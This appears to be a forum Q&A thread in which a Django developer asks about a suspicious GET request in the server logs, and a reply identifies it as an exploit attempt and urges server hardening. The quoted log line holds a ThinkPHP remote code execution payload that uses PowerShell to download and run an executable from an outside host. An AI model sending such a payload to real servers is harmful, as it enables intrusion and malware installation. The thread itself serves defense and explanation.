Concerning GET request in logs
I have a Django application running on a Digital Ocean Ubuntu server. I am using NGINX and Daphne to serve the application because I am using Django Channels.
My websockets keep crashing, and I noticed in the logs when the crash occurs, this message:
127.0.0.1:46138 - - [11/May/2021:14:03:33] "GET /public/index.php?s=index/think\ap p/invokefunction&function=call_user_func_array&vars=system&vars=cmd.exe%20 /c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hog noob.se/download.exe','%SystemRoot%/Temp/nagagewrehutkiz561.exe');start%20%SystemR oot%/Temp/nagagewrehutkiz561.exe" 404 2111
It looks very suspicious to me, but my knowledge of security is minimal. Can anyone help me determine if this is something I should be concerned about?
The fact that it is a GET request that I did not submit (nobody else is using this server currently) But perhaps it is something automatically submitted by my browser?
Can anyone help me determine if this is something I should be concerned about?
Someone is trying to exploit a vulnerability on your server. References to
%SystemRoot%indicates this exploit is intended to a Windows server.
It shows your server returning HTTP 404, with 2111 bytes on the response (those last 2 values on your log). That means your server does not have the vulnerable
/public/index.phpfile, so no damage was done on this case.
Your websocket probably is dying because you aren't properly processing unexpected input, and this is a MASSIVE SECURITY ISSUE (bold capitals because I cannot use blinking red text font). Failing to detect malformed input and reacting to that is the source of countless exploits.
If you don't know much about security, you can be sure that your server will be hacked sooner or later. Take your server offline, install a Linux VM on your desktop, and train on your VM first. Read articles on Linux hardening, on securing Nginx and Django, on secure coding. Your server can be a threat to anyone on the internet as soon as someone hacks it and turns it into a hacking platform to launch attacks.
nobody else is using this server currently
As soon as your server is reachable from the internet, that statement is not true anymore.